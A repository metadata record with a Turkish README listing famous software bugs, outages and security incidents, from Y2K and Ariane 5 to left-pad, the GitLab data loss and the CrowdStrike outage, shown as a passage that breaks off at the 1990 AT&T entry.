{"id":13496396,"url":"https://github.com/umutphp/famous-bugs","last_synced_at":"2026-01-23T18:32:02.018Z","repository":{"id":43639015,"uuid":"298916357","full_name":"umutphp/famous-bugs","owner":"umutphp","description":"Famous bugs fixed, problems solved and failures experienced  in software history :bug: :bee: :ant: :beetle:","archived":false,"fork":false,"pushed_at":"2025-10-24T10:14:32.000Z","size":342,"stargazers_count":293,"open_issues_count":3,"forks_count":8,"subscribers_count":9,"default_branch":"master","last_synced_at":"2025-10-24T12:21:40.138Z","etag":null,"topics":["bug","famous-bugs","hacktoberfest","problem","y2k"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"cc-by-sa-4.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/umutphp.png","metadata":{"files":{"readme":"README-tr.md","changelog":null,"contributing":".github/contributing.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null},"funding":{"patreon":"umutphp"}},"created_at":"2020-09-26T23:26:07.000Z","updated_at":"2025-10-24T10:14:36.000Z","dependencies_parsed_at":"2022-07-09T15:03:05.819Z","dependency_job_id":"9f798e42-e043-48d0-ab1b-fdc464367c1e","html_url":"https://github.com/umutphp/famous-bugs","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/umutphp/famous-bugs","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/umutphp%2Ffamous-bugs","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/umutphp%2Ffamous-bugs/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/umutphp%2Ffamous-bugs/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/umutphp%2Ffamous-bugs/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/umutphp","download_url":"https://codeload.github.com/umutphp/famous-bugs/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/umutphp%2Ffamous-bugs/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":28697428,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-01-23T17:25:48.045Z","status":"ssl_error","status_checked_at":"2026-01-23T17:25:47.153Z","response_time":59,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bug","famous-bugs","hacktoberfest","problem","y2k"],"created_at":"2024-07-31T19:01:47.364Z","updated_at":"2026-01-23T18:32:02.005Z","avatar_url":"https://github.com/umutphp.png","language":null,"readme":"# famous-bugs :bug: :honeybee: :ant:\n\n[![Markdown Linter](https://github.com/umutphp/famous-bugs/actions/workflows/markdown-linter-action.yml/badge.svg)](https://github.com/umutphp/famous-bugs/actions/workflows/markdown-linter-action.yml) [![Contributor Covenant](https://img.shields.io/badge/Contributor%20Covenant-v2.0%20adopted-ff69b4.svg)](./.github/CODE_OF_CONDUCT.md)\n\nGeliştiricilerin faydalı bulabileceği derlenmiş problemler, hatalar ve sistem çöküşlerinin listesi.\n\n[Çeviriler](#%C3%A7eviriler): [🇹🇷](https://github.com/umutphp/famous-bugs/blob/master/README-tr.md)\n\n---\n\n\u003c!-- START doctoc generated TOC please keep comment here to allow auto update --\u003e\n\u003c!-- DON'T EDIT THIS SECTION, INSTEAD RE-RUN doctoc TO UPDATE --\u003e\n\n- [Giriş](#giri%C5%9F)\n- [Problemler](#problemler)\n  - [Saldıran Sürü Problemi](#sald%C4%B1ran-s%C3%BCr%C3%BC-problemi)\n  - [N+1 Sorgu Problemi](#n1-sorgu-problemi)\n  - [Kırılma Noktası Problemi](#k%C4%B1r%C4%B1lma-noktas%C4%B1-problemi)\n  - [2000 Yılı Problemi](#2000-y%C4%B1l%C4%B1-problemi)\n- [Çöküşler ve Saldırılar (Hack)](#%C3%87%C3%B6k%C3%BC%C5%9Fler-ve-sald%C4%B1r%C4%B1lar-hack)\n  - [Gangnam Style YouTube'u Bozdu](#gangnam-style-youtubeu-bozdu)\n  - [Wikimedia'da Bir Çiçek Resmine Gelen Gizemli Trafik](#wikimediada-bir-%C3%87i%C3%A7ek-resmine-gelen-gizemli-trafik)\n  - [NPM Leftpad Olayı](#npm-leftpad-olay%C4%B1)\n  - [Heathrow Terminal 5 Açılışı](#heathrow-terminal-5-a%C3%A7%C4%B1l%C4%B1%C5%9F%C4%B1)\n  - [20 Temmuz 2016 Stack Overflow'un Çöküşü](#20-temmuz-2016-stack-overflowun-%C3%87%C3%B6k%C3%BC%C5%9F%C3%BC)\n  - [Gitlab Veritabanın Silinmesi](#gitlab-veritaban%C4%B1n-silinmesi)\n  - [PHP Git Commit Olayı](#php-git-commit-olay%C4%B1)\n  - [4 Ekim Facebook Çöküşü](#4-ekim-facebook-%C3%87%C3%B6k%C3%BC%C5%9F%C3%BC)\n  - [Cloudflare 2019 Çöküşü](#cloudflare-2019-%C3%87%C3%B6k%C3%BC%C5%9F%C3%BC)\n  - [2017 Equifax Veri Sızıntısı](#2017-equifax-veri-s%C4%B1z%C4%B1nt%C4%B1s%C4%B1)\n  - [Büyük Mavi Ekran Günü](#b%C3%BCy%C3%BCk-mavi-ekran-g%C3%BCn%C3%BC)\n- [Hatalar (Bug) ve Solucanlar](#hatalar-bug-ve-solucanlar)\n  - [İlk Hata (Bug)](#%C4%B0lk-hata-bug)\n  - [Ariane 5'in Patlaması](#ariane-5in-patlamas%C4%B1)\n  - [NASA'nın Mars İklim Uydusunda Metrik Sistem Karmaşası](#nasan%C4%B1n-mars-%C4%B0klim-uydusunda-metrik-sistem-karma%C5%9Fas%C4%B1)\n  - [Morris Solucanı](#morris-solucan%C4%B1)\n  - [BT Yüzünden Ölmek](#bt-y%C3%BCz%C3%BCnden-%C3%96lmek)\n  - [1990 AT\u0026T Ağının Çöküşü](#1990-att-a%C4%9F%C4%B1n%C4%B1n-%C3%87%C3%B6k%C3%BC%C5%9F%C3%BC)\n  - [ILOVEYOU Solucanı](#iloveyou-solucan%C4%B1)\n  - [Zune Bug](#zune-bug)\n  - [Unutulmuş Boşluk Karakteri](#unutulmu%C5%9F-bo%C5%9Fluk-karakteri)\n  - [Rachel True'nun iCloud'da Yaşadığı Problem](#rachel-truenun-icloudda-ya%C5%9Fad%C4%B1%C4%9F%C4%B1-problem)\n  - [MySpace Solucan (Samy Solucanı)](#myspace-solucan-samy-solucan%C4%B1)\n  - [Şifre Hash İşlemini Bozan \"PHP Hack\" Problemi](#%C5%9Eifre-hash-%C4%B0%C5%9Flemini-bozan-php-hack-problemi)\n  - [Log4Shell - İnterneti Çökertebilecek Güvenlik Açığı](#log4shell---%C4%B0nterneti-%C3%87%C3%B6kertebilecek-g%C3%BCvenlik-a%C3%A7%C4%B1%C4%9F%C4%B1)\n- [AI](#ai)\n  - [Microsoft Tay Chatbot (2016)](#microsoft-tay-chatbot-2016)\n- [Çeviriler](#%C3%87eviriler)\n- [Katkıda Bulunmak İçin](#katk%C4%B1da-bulunmak-%C4%B0%C3%A7in)\n\n\u003c!-- END doctoc generated TOC please keep comment here to allow auto update --\u003e\n\n---\n\n## Giriş\n\nYazılım geliştiricileri olarak işimizi basitçe hataları düzeltmek ve problemlere çözüm geliştirmek olarak tanımlayabiliriz. Bu liste, geliştiricilerin yararlı bulabileceği, derlenmiş problemler ve hatalar listesidir. Umarım daha büyük bir değer yaratmak için topluluk odaklı bir liste olur.\n\n## Problemler\n\n### Saldıran Sürü Problemi\n\n\u003e Bieber bir fotoğraf paylaşırdı ve pek çok takipçisi, Instagram'ın sunucularının yetişemeyeceği şekilde \"Like\" düğmesine basarlardı.\n\u003e\n\u003e [Wired.com](https://www.wired.com/2015/11/how-instagram-solved-its-justin-bieber-problem/)\n\nJustin Bieber bir fotoğraf yayınladığında, pek çok \"Belieber\" fotoğrafı \"Beğenir\" ve bu da çok fazla sayıda bildirim, sorgu ve işleme neden olur. Instagram ekibinin karşılaştığı bu problem aslında [saldıran sürü probleminin](https://en.wikipedia.org/wiki/Thundering_herd_problem) çok güzel bir örneğidir. Bu problemin tekrar tekrar olmasını önlemek için birçok iyileştirme yaptılar ve yaptıklarını bu [makalede](https://instagram-engineering.com/instagration-pt-2-scaling-our-infrastructure-to-multiple-data-centers-5745cbad7834) anlattılar.\n\nEk kaynaklar:\n\n- [Saldıran sürü problemi](https://www.wikiwand.com/en/Thundering_herd_problem)\n- [Instagram Justin Bieber Problemini Nasıl Çözdü?](https://www.wired.com/2015/11/how-instagram-solved-its-justin-bieber-problem/)\n\n### N+1 Sorgu Problemi\n\n\u003e ... öğe n tane ilişkili alt öğe içerdiğinde n+1 isteğe dönüşür.\n\u003e\n\u003e [InfoQ](https://www.infoq.com/articles/N-Plus-1/)\n\nN+1 problemi, kod bir ana öğenin çocuklarını bir ilişkide yüklemeye çalıştığında ortaya çıkar (örneğin, none-to-many ilişkiler). Hemen hemen tüm ORM'ler, varsayılan olarak tembel yüklemeyi etkinleştirir. İlişkilerle beraber gelen verilerle bir kayıt listesi oluşturmak istediğinizi varsayın. Ana öğeleri getirmek için bir sorgu ve N tane ana öğenin alt kayıtları için N sorgu (ilişkiden verileri almak için her biri için bir sorgu) yapılır. Tahmin edebileceğiniz gibi, tek bir sorgu yerine N+1 sorguları yapmak, veritabanınızı sorgularla doldurur, bu da kaçınmamız gereken bir şeydir. Çok şükür ki, ORM'ler sorunu oldukça uzun süredir biliyorlar ve buna yerleşik çözümleri vardır. Çözüm aslında basit: geliştirme sırasında, ORM'ye önceden ek verilere ihtiyacınız olduğunu söylemelisiniz (önyükleme).\n\nEk kaynaklar:\n\n- [N+1 Sorgu ve Bunlardan Nasıl Kaçınılır!](https://medium.com/@bretdoucette/n-1-queries-and-how-to-avoid-them-a12f02345be5)\n\n### Kırılma Noktası Problemi\n\n\u003e Amazon, Reddit, Twitter and Twitch gibi büyük internet sitelerinin de dahil olduğu büyük bir çökme yaşandı ... Sorunun kaynağı bir CDN sağlayıcı olan Fastly'de yaşanan ve kendisinin de onayladığı global çöküş.\n\u003e\n\u003e [Engadged](https://www.engadget.com/a-huge-outage-is-affecting-large-swaths-of-the-internet-102354305.html)\n\nKırılma noktası (SPOF), arızalandığında tüm sistemin çalışmasını durduracak bir sistem parçasıdır. SPOF, yüksek erişilebilirlik veya güvenilirlik hedefi olan herhangi bir sistemde istenmeyen bir durumdur.Sistemin yazılım ve donanım bileşenlerinin yanı sıra bulut satıcısı da bir sistemin SPOF'u olabilir. 8 Haziran 2021'de yaşanan büyük internet çöküşü (CDN sağlayıcısı Fastly'nin çökmesi birçok büyük siteyi etkiledi) bu durum için mükemmel bir örnektir.\n\nEk kaynaklar:\n\n- [SPOF: What Is a Single Point of Failure in IT?](https://techwithtech.com/single-point-of-failure/)\n\n### 2000 Yılı Problemi\n\n\u003e ... 2000 yılını 1900 yılından ayırt edilemez hale getiriyor.\n\n2000 Yılı Problemi (Y2K sorunu, Millennium hatası, Y2K hatası, Y2K hatası veya Y2K olarak da bilinir), 2000 yılından başlayan tarihler için takvim verilerinin biçimlendirilmesi ve depolanması nedeniyle oluşan sorunları ifade eder. Bu problem tüm dünyada yaşandı ve belgelendi. İşte bazı örnekler:\n\n- 1 Ocak 1999'da Singapur'da taksi sayaçları çalışamaz hale geldi.\n- 1 Ocak 2000'de Japonya, Onagawa'da, gece yarısından iki dakika sonra bir nükleer santralde alarm çaldı.\n- 1 Mart 2000'de Amerika Birleşik Devletleri'nde Sahil Güvenlik'in mesaj işleme sistemi etkilendi.\n- Norveç ve Finlandiya, bir kişinin doğduğu yüzyılı doğru bir şekilde belirtmek için ulusal kimlik numaralarını değiştirmek zorunda kaldı.\n\nEk kaynaklar:\n\n- [Wikipedia'da 2000 Yılı Sorunu](https://en.wikipedia.org/wiki/Year_2000_problem)\n\n## Çöküşler ve Saldırılar (Hack)\n\n### Gangnam Style YouTube'u Bozdu\n\n\u003e Bir videonun izlenme sayısının 32 bitlik bir tam sayıdan büyük olacağını asla düşünmemiştik.\n\u003e\n\u003e Youtube\n\nYouTube'un izlenme sayacı daha önce 32 bitlik bir tamsayı kullanıyordu, bu da sayabileceği maksimum olası görüntülemenin 2.147.483.647 olduğu anlamına geliyordu. Ve \"[Gangnam Style](https://www.youtube.com/watch?v=9bZkp7q19f0)\" 2 milyarlık görüntüleme sayısını aştı. YouTube'da, bir videonun alabileceği maksimum görüntüleme sayısı artık 9,223,372,036,854,775,808 olacak şekilde 64 bit tam sayıya yükseltildi.\n\n### Wikimedia'da Bir Çiçek Resmine Gelen Gizemli Trafik\n\n\u003e Veri merkezlerimizden birine gelen tüm taleplerin% 20'si bu çiçek görüntüsü içindir. Kimse nedenini bilmiyor.\n\u003e\n\u003e [Chris Albon](https://twitter.com/chrisalbon/status/1358890731981611009)\n\n3 Şubat 2021'de, Wikimedia teknoloji ekibi Hindistan'daki çeşitli ISS'lerden günde yaklaşık 90 milyon istek aldıklarını fark etti. İsteklerin tümü bir resim dosyası içindir (aşağıya bakın). Bunun bu resmi açılış ekranına koymuş bir mobil uygulama olabileceğini varsaydılar. Wikimedia uygulamayı açıklamadı, ancak bunun TikTok yerine kullanılabilecek bir uygulama olabileceğini düşünüldü. Çünkü, Hindistan o sırada TikTok'u tamamen yasaklama kararı almıştı ve bu da insanları alternatif uygulamalar kullanmaya yönlendirmişti. Bu kararla başlayan kelebek etkisi, bunu Wikimedia ve gizemli uygulamanın ekipleri için unutulmayacak bir anıya dönüştürdü.\n\n[![Symphyotrichum novi-belgii](./assets/images/220px-AsterNovi-belgii-flower-1mb.jpg)](https://en.wikipedia.org/wiki/Symphyotrichum_novi-belgii#/media/File:AsterNovi-belgii-flower-1mb.jpg)\n\nEk kaynaklar:\n\n- [Phabricator Post](https://phabricator.wikimedia.org/T273741)\n\n### NPM Leftpad Olayı\n\n\u003e Github'da yalnızca 10 yıldızlı left-pad adında 11 satırlık bir npm paketi yayından kaldırıldı... npm'deki en önemli paketlerden bazıları hata vermeye başladı.\n\u003e\n\u003e [Reddit](https://www.reddit.com/r/programming/comments/4bjss2/an_11_line_npm_package_called_leftpad_with_only/)\n\n[Azer Koçulu](https://kodfabrik.com/) npm'de yazdığı basit bir kodu yayınladı ve bu çok popüler oldu. Pek çok proje bu paketi bağımlılık olarak kullandı. 11 Mart'ta, bir mesajlaşma uygulaması olan Kik için çalışan patent ve ticari marka temsilcisinden bir e-posta aldı. KiK ayrıca onun başka bir paketinin de adıydı. Kik paketini yeniden adlandırmasını istediler ancak Azer bunu kabul etmedi. Sonra ajans NPM'i bunu yapmaya zorladı ve bunda başarılı oldu. NPM'nin kararından sonra Azer Koçulu, left-pad dahil tüm paketlerini sildi. Daha sonra, dünyadaki birçok JavaScript programcısı \"npm ERR! 404 'left-pad' is not in the npm registry\" hata mesajını almaya başladı.\n\nEk kaynaklar:\n\n- [Modüllerimi Az Önce Özgürleştirdim](https://web.archive.org/web/20210327093144/https://kodfabrik.com/journal/i-ve-just-liberated-my-modules)\n- [kik, left-pad ve npm](https://blog.npmjs.org/post/141577284765/kik-left-pad-and-npm)\n\n### Heathrow Terminal 5 Açılışı\n\n\u003e ... herhangi bir nedenle test edilmeyen basit ve gerçek senaryolar.\n\nHeathrow Terminal 5 resmi olarak 14 Mart 2008'de açıldı. Açılış gününde planlandığı gibi çalışmadı, bu nedenle British Airways 34 uçuşu iptal etmek ve bagaj kontrolünü askıya almak zorunda kaldı.\n\nYeni bagaj taşıma sistemi yazılımı, bazı nedenlerden dolayı test edilmeyen gerçek senaryoları kaldıramadı. Örneğin, mal sahibi bir şeyi unuttuğu için bir bagaj manuel olarak geri taşındı. Bu durumda, program çöktü ve eşya kaydedilemedi. Bagaj işleme her zaman bu tür küçük ayrıntılarla kesintiye uğrardı.\n\nSonraki on gün boyunca, yaklaşık 42.000 ürün mal sahiplerine teslim edilmedi ve 500'den fazla uçuş iptal edildi. Diğer uçuşlara check-in geçici olarak yapılamaz hale geldi.\n\nEk kaynaklar:\n\n- [Teknik aksaklıklar T5 açılışını vurdu](http://news.bbc.co.uk/2/hi/uk_news/7314816.stm)\n- Wikipedia'da [Heathrow Terminal 5](https://en.wikipedia.org/wiki/Heathrow_Terminal_5#Opening)\n\n### 20 Temmuz 2016 Stack Overflow'un Çöküşü\n\n\u003e Regular expression şuydu: ^[\\s\\u200c]+|[\\s\\u200c]+$ ...\n\u003e\n\u003e [Çöküş Raporu - 20 Temmuz 2016](https://stackstatus.net/post/147710624694/outage-postmortem-july-20-2016)\n\n20 Temmuz 2016'da Stack Overflow, regular expression'lardan birinin Stack Overlfow web sunucularında yüksek CPU tüketmesine neden olan hatalı biçimlendirilmiş bir gönderi nedeniyle 34 dakikalık bir kesinti yaşadı. Bu çok tipik bir regular expression hizmet reddi (ReDoS) saldırısıydı, ancak hatalı biçimlendirilmiş gönderinin bir süre ana sayfada görüntülenmesi nedeniyle gerçekleşti. Dolayısıyla, regular expression kontrolleri (eşleşme veya uyumsuzluk) işlemci kaynaklarını tamamen tüketi. Ana sayfa, yük dengeleyiciler tarafından healthcheck için kullanıldığından, sitenin tamamı kullanılamaz hale geldi.\n\nEk kaynaklar:\n\n- [Regular Expression Hizmet Reddi (ReDoS) cheat-sheet sayfası](https://levelup.gitconnected.com/the-regular-expression-denial-of-service-redos-cheat-sheet-a78d0ed7d865)\n- [Çöküş Raporu - 20 Temmuz 2016](https://stackstatus.net/post/147710624694/outage-postmortem-july-20-2016)\n\n### Gitlab Veritabanın Silinmesi\n\n\u003e ...yanlışlıkla canlıdaki veritabanını sildi. Veritabanı yedeklerinin olduğu klasörün boş olması durumu daha da kötüleştirdi. Bir ayar hatasından dolayı bir süredir yedekleme de çalışmıyormuş...\n\u003e\n\u003e [Dzone](https://dzone.com/articles/the-biggest-software-failures-in-recent-years)\n\n31 Ocak 2017'de Gitlab yedeklemenin ne kadar önemli olduğunu gösterecek bir sorun ile karşılaştı. Veritabanı sunucuları mimarisinde çok temel bir değişikliğe gitme kararı aldılar. Bunu uygularken yanlışlıkla canlıdaki veriatabanı silindi. Bir süredir yedekleme işleminin bir ayar hatası yüzünden çalışmadığı ve ellerinde güncel bir yedeğin olmadığını farkedince durum iyice kötüleşti. Büyük ihtimalle panik için ellerinden geleni yapmaya çalıştırlar ama sonuç yaklaşık 300 GB'lık müşteri verisinin kaybı ve 18 saatlik bir kesinti oldu. Gitlab konuyla ilgili oldukça dürüst ve detaylı bir [rapor](https://about.gitlab.com/blog/2017/02/10/postmortem-of-database-outage-of-january-31/) yayınladı. Olayın nasıl olduğunu ve nasıl düzeltildiğini anlatan [bu vidyoyu](https://www.youtube.com/watch?v=tLdRBsuvVKc) da izleyebilirsiniz.\n\n### PHP Git Commit Olayı\n\n\u003e Selamlar,\n\u003e\n\u003e Dün (2021-03-28) php-src reposuna biri benim tarafımdan biri de Rasmus Lerdof tarafından yapılmış gibi zararlı iki adet commit atıldı.\n\u003e Bunun nasıl olduğunu tam olarak bilmiyoruz...\n\u003e\n\u003e [Nikita Popov](https://news-web.php.net/php.internals/113838)\n\n28 Mart 2021'de Nikita Popoz (proje yürütücülerinden biri) php-src reposuna kendi adına ve Rasmus Lerdof (PHP'nin yaratıcısı) adına yapılmış gibi iki zararlı commit atıldığını duyurdu. Buna sebep olan şeyin ne olduğu açıkça duyurulmadı ama Nikita bütün şüphelerin kendilerini hesaplarla ilgili bir sızıntının değil de kendilerinin yönettiği git sunucusunda oluşan bir açığa yönlendirdiğini belirtti. Bu olay saldırganların üretim bandında kullanılan araçlar, açık kaynak proje, kütüphane ya da komponent üzerinden yaptıkları \"supply-chain attack\" saldırına güzel bir örnektir.\n\nEk kaynaklar:\n\n- [Git commit işleyişinde değişiklikler](https://news-web.php.net/php.internals/113838)\n- [PHP hadisesi kullanılan araçların doğrulanması gerekliğini gösterdi](https://www.csoonline.com/article/3613593/php-backdoor-attempt-shows-need-for-better-code-authenticity-verification.html)\n\n### 4 Ekim Facebook Çöküşü\n\n\u003e ... temel nedeni yaptığımız hatalı bir yapılandırma değişikliğiydi.\n\u003e\n\u003e [Facebook](https://engineering.fb.com/2021/10/04/networking-traffic/outage/)\n\n4 Ekim 2021'de saat 15:39 UTC'te başlayarak Facebook, Messenger, Instagram, WhatsApp, Mapillary ve Oculus yedi saatten fazla bir süre dünya genelinde kullanılamayacak hale geldi. Ayrıca, web sitelere erişim için kullanılan \"Facebook ile Giriş Yap\" özelliği de kullanılamaz hale geldi. Facebook ekibi temel nedenin veri merkezleri arasındaki ağ trafiğini koordine eden ağ yönlendiricilerindeki yapılan bir yapılandırma değişikliğinin olduğunu açıkladı.\n\n- [Facebook Potmortem](https://engineering.fb.com/2021/10/04/networking-traffic/outage/)\n- [2021 Facebook Outage](https://en.wikipedia.org/wiki/2021_Facebook_outage)\n\n### Cloudflare 2019 Çöküşü\n\n\u003e ... WAF Yönetilen Kurallarımızda yeni bir kural dağıteklediktık ve bu kural HTTP/HTTPS trafiğini yöneten işlemci kaynağının tükenmesine neden oldu ...\n\u003e\n\u003e [Postmortem](https://blog.cloudflare.com/details-of-the-cloudflare-outage-on-july-2-2019/)\n\nCloudflare'in 2 Temmuz 2019 tarihli çöküşü, şirketin Web Uygulama Güvenlik Duvarı (WAF) yazılımında rutin bir canlıya çıkış sırasında yapılan yapılandırma hatası nedeniyle tetiklendi. Bu hata, Cloudflare ağının çökmesine ve Cloudflare'in altyapısına bağımlı birçok web sitesi ve çevrimiçi hizmet için yaygın hizmet kesintilerine yol açtı. Arıza, popüler web siteleri, e-ticaret platformları, sosyal medya ağları ve hatta hükümet hizmetleri de dahil olmak üzere geniş bir çevrimiçi platform yelpazesini etkiledi.\n\n- [Cloudflare Postmortem](https://blog.cloudflare.com/details-of-the-cloudflare-outage-on-july-2-2019/)\n- [Major outage was a lot more than “a regular expression went bad”](https://hub.packtpub.com/cloudflare-rca-major-outage-was-a-lot-more-than-a-regular-expression-went-bad/)\n\n### 2017 Equifax Veri Sızıntısı\n\n\u003e Eylül 2017'de Equifax, yaklaşık 147 milyon insanın kişisel bilgilerini etkileyen bir veri ihlali yaşadığını duyurdu.\n\u003e\n\u003e [EQUIFAX DATA BREACH SETTLEMENT](https://www.equifaxbreachsettlement.com/)\n\n2017 yılında, en büyük tüketici kredi raporlama kuruluşlarından biri olan Equifax, milyonlarca insanın kişisel bilgilerini etkileyen büyük bir veri sızıntısı yaşadı. Bu ihlal, Equifax'ın web sitesi yazılımında bir zafiyet sonucunda meydana geldi ve bu zafiyet, hacker'ların şirketin sistemlerine yetkisiz erişim sağlamasına ve hassas verileri ele geçirmesine sebep oldu.\n\n- [EQUIFAX DATA BREACH SETTLEMENT](https://www.equifaxbreachsettlement.com/)\n- [2017 Equifax data breach](https://en.wikipedia.org/wiki/2017_Equifax_data_breach)\n\n### Büyük Mavi Ekran Günü\n\n\u003e ... bankacılık, havayolları, tedarikçiler, medya şirketleri ve tren yolları ağları gibi bir çok sektördeki Microsoft Windows kullanan bilgisayarlar etkilendi. Em büyük zararın turizm sektöründe olduğu düşünülüyor...\n\u003e\n\u003e [CrowdStrike’s chief executive, George Kurtz](https://techcrunch.com/2024/07/19/faulty-crowdstrike-update-causes-major-global-it-outage-taking-out-banks-airlines-and-businesses-globally/)\n\n19 Temmuz 2024'53 dünyanın dört bir tarafından şirketler IT problemi yaşadaıklarını belirtmeye başladılar ve bu tüm zamanların eş zamanlı en yaygın IT çöküşlerinden biriydi. Bu durumun  bir siber güvenlik şirketi olan CrowdStrike tarafından yapılan bir güncellemeden kaynaklandığı ortaya çıktı. Bu durum bankacılık, havayolları, tedarikçiler, medya şirketleri ve tren yolları ağları gibi bir çok sektördeki Microsoft Windows kullanan bilgisayarlar etkiledi. Em büyük zararın turizm sektöründe olduğu düşünülüyor.\n\n- [Statement on Falcon Content Update for Windows Hosts](https://www.crowdstrike.com/blog/statement-on-falcon-content-update-for-windows-hosts/)\n- [Our Statement on Today’s Outage](https://www.crowdstrike.com/blog/our-statement-on-todays-outage/)\n\n## Hatalar (Bug) ve Solucanlar\n\n### İlk Hata (Bug)\n\n\u003e Bulunan ilk gerçek hata vakası.\n\u003e\n\u003e [Grace Murray Hopper](https://en.wikipedia.org/wiki/Grace_Hopper)\n\n9 Eylül 1947'de [Mark II](https://en.wikipedia.org/wiki/Harvard_Mark_II) (Harvard Üniversitesi'nde) bozuldu. Mühendisler nedeni araştırdılar ve teşhis ettiler. Makineye bir güve (bug) girmiş ve Panel F'nin 70 numaralı rölesini kısa devre yapmıştı. Hatayı sayfaya \"İlk gerçek hata (bug) bulundu\" notuyla eklediler. Bug terimi bu şekilde doğdu.\n\n![İlk Hata](./assets/images/first_bug.jpg)\n\nBu sayfa hala Washington'daki [Smithsonian Enstitüsü Ulusal Amerikan Tarihi Müzesi'nde](https://americanhistory.si.edu/collections/search/object/nmah_334663) tutuluyor.\n\nEk kaynaklar:\n\n- [Harvard Mark II](https://en.wikipedia.org/wiki/Harvard_Mark_II)\n- [Grace Hopper](https://en.wikipedia.org/wiki/Grace_Hopper)\n\n### Ariane 5'in Patlaması\n\n\u003e ... 64 bitlik bir real sayı ... 16 bitlik işaretli bir tam sayıya dönüştürüldü.\n\n4 Haziran 1996'da, Avrupa Uzay Ajansı tarafından fırlatılan Ariane 5 roketi, havalanmasından sadece kırk saniye sonra patladı. Roket, 7 milyar dolara mal olan on yıllık bir geliştirme sürecinin ardından ilk yolculuğuna çıkmıştı. İmha edilen roket ve kargosunun değeri 500 milyon dolardı. Kaza, Avrupa'nın uzay programı için önemli bir engeldi.\n\nRoketin platforma göre yatay hızı, 16 bitlik işaretli bir tamsayı içinde saklanabilen en büyük tam sayı olan 32.767'den daha büyüktü ve bu nedenle dönüştürme başarısız oldu.\n\nEk kaynaklar:\n\n- [Rapor: Yazılım Tasarım Hataları Ariane 5 Patlamasına Neden Oldu](https://apnews.com/article/1d85f290e31cad8532636fcb576f4788)\n\n### NASA'nın Mars İklim Uydusunda Metrik Sistem Karmaşası\n\nMars İklim Uydusu, 11 Aralık 1998'de Mars iklimini incelemek için NASA tarafından fırlatılan bir robotik uzay misyonuydu. Navigasyon ekibi, hesaplamalarında metrik sistemi kullanırken, uzay aracını tasarlayan ve inşa eden ekip ivme verilerini İngiliz metrik sisteminde sağladı. Newton saniye^2 adı verilen bir kuvvet için ivme okumaları pound-saniye^2 cinsinden ölçülmüştü. Bir anlamda uzay aracı çeviride kayboldu.\n\nEk kaynaklar:\n\n- [Mars_Climate_Orbiter # Cause_of_failure](https://en.wikipedia.org/wiki/Mars_Climate_Orbiter#Cause_of_failure)\n\n### Morris Solucanı\n\n\u003e Bu bir tasarım kusuruydu ...\n\nYaratıcısı [Robert Tappan Morris'e göre](https://en.wikipedia.org/wiki/Robert_Tappan_Morris), zarar vermek için değil, güvenlik açıklarını vurgulamak için yazılmıştı. [Sendmail](https://en.wikipedia.org/wiki/Sendmail), [finger](https://en.wikipedia.org/wiki/Finger_protocol), [rsh/rexec](https://en.wikipedia.org/wiki/Berkeley_r-commands) ve zayıf şifreler yüzünden oluşan güvenlik açıklarından yararlanmak için programlanmıştır. Solucanı yaratırken Robert sistem yöneticilerinin solucanı yenmeye çalışmasını önlemek için kendini %14 oranında kopyalayacak ve bilgisayara yanlış pozitif geri bildirim yapacak şekilde programladı. Bu bir tasarım kusuruydu ve etkilenen bilgisayarda kopyalanma bombardımanı ve çökmeler yarattı.\n\nMorris Worm, İnternet üzerinden dağıtılan ilk bilgisayar solucanlarından biri olarak kabul edildi ve ana akım medyanın dikkatini çeken ilk bilgisayar solucanı oldu. Morris Solucanının kaynak kodunu içeren bir disket [Bilgisayar Tarihi Müzesi'nde](https://computerhistory.org/) tutulmaktadır.\n\nEk kaynaklar:\n\n- [Morris Solucanı](https://en.wikipedia.org/wiki/Morris_worm)\n- [Robert Tappan Morris](https://en.wikipedia.org/wiki/Robert_Tappan_Morris)\n\n### BT Yüzünden Ölmek\n\n\u003e Hastaların \"eve taburcu edildiğini\" ya da \"öldüğünü\" belirtmek için bir rakam kullanıldı.\n\u003e\n\u003e [Apnews](https://apnews.com/article/6870c9bd785360007b5981f0d5443b19#:~:text=A%20computer%20error%20at%20Saint,of%20other%20patients%20as%20deceased.\u0026text=The%20glitch%20happened%20during%20a,told%20The%20Grand%20Rapids%20Press.)\n\n2002 yılında, Grand Rapids'deki St. Mary's Mercy Tıp Merkezi hatalı bir şekilde 8500 hastanın hasta yönetim yazılımındaki bir aksaklık nedeniyle öldüğünü bildirdi. Yalancı ölüm raporları sadece hastalara değil, sigorta şirketlerine ve sosyal güvenlik bürolarına da gönderildi. Sorunun nasıl giderildiğine dair net bir şekilde belirtildi ancak yönetim yazılımı yine de değiştirildi.\n\nEk kaynaklar:\n\n- [Hastane \"Ölü\" Hastalarını Canlandırıyor](https://www.baselinemag.com/c/a/Projects-Networks-and-Storage/Hospital-Revives-Its-QTEDeadQTE-Patients)\n\n### 1990 AT\u0026T Ağının Çöküşü\n\n\u003e Sadece bir satır koddaki hata, 